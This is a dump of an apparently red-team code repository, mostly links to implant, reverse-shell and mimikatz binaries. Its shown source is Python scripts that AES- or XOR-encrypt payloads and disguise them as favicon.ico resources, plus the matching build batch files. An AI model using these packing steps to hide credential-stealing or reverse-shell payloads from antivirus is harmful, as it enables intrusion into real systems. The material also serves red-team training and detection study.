https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.obj
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good_no_names.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_no_names.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good_w_names.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_w_names.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/Readme.md:
--------------------------------------------------------------------------------
1 | All the source and binaries used to develop a survivable mimikatz executable
2 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/mimikatz.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/aesencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 | from Crypto.Cipher import AES
8 | from os import urandom
9 | import hashlib
10 |
# 16 random bytes from the OS, regenerated on every run. aesenc() hashes this
# value with SHA-256 to get the actual AES key; the raw value is what the
# script prints as AESkey[] at the end.
KEY = urandom(16)
12 |
def pad(s):
    """Pad `s` up to a multiple of AES.block_size and return the result.

    Appends n copies of chr(n), where n = AES.block_size - len(s) % AES.block_size.
    An input whose length is already a multiple gets one whole extra block.
    The padding is built with chr(), so `s` has to be a str (Python 2 byte string).
    """
    return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
15 |
def aesenc(plaintext, key):
    """Encrypt `plaintext` with AES in CBC mode and return the ciphertext.

    The cipher key is the SHA-256 digest of `key` (32 bytes), not `key`
    itself. `plaintext` is padded with pad() before encryption.
    """

    k = hashlib.sha256(key).digest()
    # Fixed all-zero IV: under the same key, equal inputs give equal output.
    iv = 16 * '\x00'
    plaintext = pad(plaintext)
    cipher = AES.new(k, AES.MODE_CBC, iv)

    # A str IV and bytes(<str>) rely on str being a byte string (Python 2).
    return cipher.encrypt(bytes(plaintext))
24 |
25 |
# Read the file named by the first command-line argument as raw bytes.
try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    # sys.exit() without an argument ends the script with status 0.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = aesenc(plaintext, KEY)
# The ciphertext is stored under an icon file name. resources.rc in this
# directory embeds favicon.ico as RCDATA (FAVICON_ICO, id 100), so the built
# binary carries an RCDATA blob that is AES output rather than an icon: high
# entropy and no icon header, which is something resource triage can flag.
open("favicon.ico",'wb').write(ciphertext)
# Both arrays are printed as C initializers with unpadded hex digits.
# AESkey[] is the raw 16-byte KEY, not the SHA-256 digest used as cipher key.
# ord(x) per element expects 1-character strings (Python 2).
print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };')
36 |
37 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Step 1: compile the resource script to resources.res, then convert it to
REM a 64-bit object file (resources.o) that the linker accepts.
REM resources.rc declares favicon.ico as RCDATA, so the bytes of that file
REM are linked into mimikatz.exe as a resource.
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res

REM Step 2: build mimikatz.cpp as C (/Tc) into a 64-bit console executable and
REM link resources.o into it. /GS- turns stack buffer security checks off,
REM /W0 suppresses all warnings, /Od disables optimisation, /MT links the
REM static CRT. Options after /link go to the linker.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcmimikatz.cpp /link /OUT:mimikatz.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/favicon.ico
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/mimikatz.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.obj
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.o
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
3 | FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.res
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/shellcode.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/Readme.md:
--------------------------------------------------------------------------------
1 | Source and binaries for achieving reverse shells on modern Windows systems.
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 |
4 |
# Read the file named by the first command-line argument as raw bytes.
try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    # sys.exit() without an argument ends the script with status 0.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


# Write an unmodified copy of the input to payload.out in the current
# directory, overwriting any existing file of that name.
open("payload.out",'wb').write(plaintext)
# Print the bytes as one C initializer line: unsigned char payload[] = { 0x.., ... };
# hex(...)[2:] is not zero-padded, so byte 5 is printed as 0x5.
# ord(x) per element expects 1-character strings, i.e. Python 2; on Python 3
# iterating bytes yields ints and ord() raises TypeError.
print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
14 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implantv1.cpp as C++ (/Tp) into a 64-bit console executable named
REM implantv1.exe. /GS- turns stack buffer security checks off, /W2 sets
REM warning level 2, /Od disables optimisation, /MT links the static CRT,
REM /DNDEBUG defines NDEBUG. Options after /link go to the linker.
cl.exe /nologo /Od /MT /W2 /GS- /DNDEBUG /Tpimplantv1.cpp /link /OUT:implantv1.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implant.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implantv1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implantv1.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
# Fixed 15-character ASCII key; xor() repeats it across the whole input.
# Wherever the input holds a run of zero bytes, the output shows this text
# verbatim, so the string is a usable search term when triaging a blob.
KEY = "WindowsSystem32"
9 |
def xor(data, key):
    """Return `data` XORed element by element with `key`, repeating `key` as needed.

    The result is built up as a str, one chr() per input element. Applying
    the function again with the same key gives back the input.
    """

    key = str(key)
    l = len(key)  # not used below; the loop calls len(key) again
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        # Key index wraps around, so the key repeats every len(key) elements.
        current_key = key[i % len(key)]
        # ord() on `current` needs a 1-character string; indexing bytes on
        # Python 3 gives an int and would raise TypeError here.
        output_str += chr(ord(current) ^ ord(current_key))

    return output_str
22 |
def printCiphertext(ciphertext):
    """Print `ciphertext` as a C initializer body: { 0x.., 0x.., ... };

    Hex digits are not zero-padded. Nothing in this file calls the function;
    the script's last print statement repeats the same expression inline.
    """
    print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
# Read the file named by the first command-line argument as raw bytes.
try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    # sys.exit() without an argument ends the script with status 0.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


ciphertext = xor(plaintext, KEY)
# xor() returns a str; writing it to a file opened 'wb' works where str is a
# byte string (Python 2). payload.out is overwritten if it exists.
open("payload.out",'wb').write(ciphertext)
# Two output lines that together form one C array definition.
print("unsigned char payload[] = ")
print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
39 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implantv2.cpp as C++ (/Tp) into a 64-bit console executable. The
REM output is named implant.exe, not implantv2.exe.
REM /GS- turns stack buffer security checks off, /W0 suppresses all warnings,
REM /Od disables optimisation, /MT links the static CRT, /DNDEBUG defines
REM NDEBUG. Options after /link go to the linker.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplantv2.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implant.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/implantv2.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implantv2.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/compileDLL.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Compiles every .cpp file in the current directory and links them into
REM reverse.dll (/link /DLL) with the static CRT (/MT) at warning level 1.
REM _USRDLL and _WINDLL are defined for the sources; _CRT_SECURE_NO_WARNINGS
REM silences the CRT's deprecation warnings for the unchecked string
REM functions. No /MACHINE option is given, so the target architecture
REM follows the toolchain environment the script is run from.
cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll
echo Cleaning up...
REM Deletes all .obj, .lib and .exp files in the current directory, not only
REM the ones this build produced.
del *.obj *.lib *.exp
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverse.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.dll
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/Readme.md:
--------------------------------------------------------------------------------
1 | Implantv3 Main.cpp
2 |
3 | For VX-API check out:
4 | https://github.com/vxunderground/VX-API
5 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/x64/Release/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implant.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb
--------------------------------------------------------------------------------
/Cpp/making_malware/misc/mm#2/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/misc/readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
# Read the file named by the first command-line argument as raw bytes.
try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    # sys.exit() without an argument ends the script with status 0.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


# Write an unmodified copy of the input to payload.out in the current
# directory, overwriting any existing file of that name.
open("payload.out",'wb').write(plaintext)
# Print the bytes as one C initializer line: unsigned char payload[] = { 0x.., ... };
# hex(...)[2:] is not zero-padded, so byte 5 is printed as 0x5.
# ord(x) per element expects 1-character strings, i.e. Python 2; on Python 3
# iterating bytes yields ints and ord() raises TypeError.
print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
12 |
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds reverse.cpp as C++ (/Tp) into a 64-bit console executable named
REM reverse.exe. /GS- turns stack buffer security checks off, /W0 suppresses
REM all warnings, /Od disables optimisation, /MT links the static CRT,
REM /DNDEBUG defines NDEBUG. Options after /link go to the linker.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpreverse.cpp /link /OUT:reverse.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/payload.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/payload.out
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverse.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverse.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/compileDLL.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Compiles every .cpp file in the current directory and links them into
REM reverse.dll (/link /DLL) with the static CRT (/MT) at warning level 1.
REM _USRDLL and _WINDLL are defined for the sources; _CRT_SECURE_NO_WARNINGS
REM silences the CRT's deprecation warnings for the unchecked string
REM functions. No /MACHINE option is given, so the target architecture
REM follows the toolchain environment the script is run from.
cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll
echo Cleaning up...
REM Deletes all .obj, .lib and .exp files in the current directory, not only
REM the ones this build produced.
del *.obj *.lib *.exp
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/reverse.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverse.dll
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseEXE.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseEXE.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.txt
--------------------------------------------------------------------------------
/Cpp/message_box/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/message_box/message_box.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main(){
    // MessageBox(hWnd, lpText, lpCaption, uType): no owner window (NULL), the body text,
    // the window title, and uType 0, which is the plain single-OK-button style.
    const char *body_text = "My first API call";
    const char *title_text = "Hello World!";

    MessageBox(NULL, body_text, title_text, 0);
    return 0;
}
--------------------------------------------------------------------------------
/Cpp/message_box/message_box.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/message_box/message_box.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM rc compiles resources.rc into resources.res; cvtres converts that into an x64 COFF
REM object (resources.o) which the final link line pulls into ROTD.exe.
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
REM cl flags: /Od no optimization, /MT static CRT, /DNDEBUG defines NDEBUG,
REM /Tcrotd.cpp compiles rotd.cpp as C source, console subsystem, x64.
REM /W0 turns all warnings off and /GS- disables the buffer security check (stack cookies);
REM both are diagnostic/hardening opt-outs that a build review would normally question.
cl.exe /nologo /Od /favor:AMD64 /MT /W0 /GS- /DNDEBUG /D_CRT_SECURE_NO_WARNINGS /Tcrotd.cpp /link /OUT:ROTD.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/favicon.ico
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.o
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
// Embeds the file favicon.ico as a raw-data (RCDATA) resource under the ID FAVICON_ICO
// (100 in resources.h). xorencrypt.py in this directory writes its XOR output to
// favicon.ico, so the embedded bytes are not expected to parse as an icon; an RCDATA
// blob with an image-like name that is not a valid image is worth triaging.
FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.res
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/rotd.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/rotd.obj
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "abcdefghijklmnopqrstuvwxyz"
9 |
def xor(data, key):
    """XOR each element of `data` with the matching character of a repeating `key`.

    `key` is converted with str() and reused cyclically; ord() is applied to every
    element of `data`, so `data` must yield one-character strings. Returns a str of
    the same length as `data`.

    This is reversible obfuscation, not encryption: running the output through the
    same key restores the input, and the key is the cleartext KEY constant in this
    script, so anyone holding both can recover the original bytes.
    """
    key = str(key)
    key_len = len(key)
    pieces = []

    for idx, ch in enumerate(data):
        key_ch = key[idx % key_len]
        pieces.append(chr(ord(ch) ^ ord(key_ch)))

    return "".join(pieces)
22 |
def printCiphertext(ciphertext):
    """Print `ciphertext` as a brace-wrapped, comma-separated list of 0x-prefixed hex values.

    Each element is rendered with hex(ord(x)) without zero padding. The script body
    below does not call this helper; it repeats the same expression inline.
    """
    hex_values = [hex(ord(ch))[2:] for ch in ciphertext]
    print('{ 0x' + ', 0x'.join(hex_values) + ' };')
25 |
26 |
27 |
# Script body: read the file named by the first argument, XOR it with KEY, write the
# result to favicon.ico and print it as a hex list.
# The bare `except` means any failure while opening or reading (missing argument,
# unreadable path) ends with the same usage message.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = xor(plaintext, KEY)

# The output keeps an icon filename although it holds XORed data; resources.rc in this
# directory embeds that file as RCDATA. A name/content mismatch like this is checkable.
with open("favicon.ico", 'wb') as dst:
    dst.write(ciphertext)
printCiphertext(ciphertext)
38 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds reverse_shell.cpp (compiled as C via /Tc) into a console x64 reverse_shell.exe.
REM /Od no optimization, /MT static CRT, /MP parallel compilation, /DNDEBUG defines NDEBUG.
REM /W0 turns all warnings off and /GS- disables the buffer security check (stack cookies).
cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe:
--------------------------------------------------------------------------------
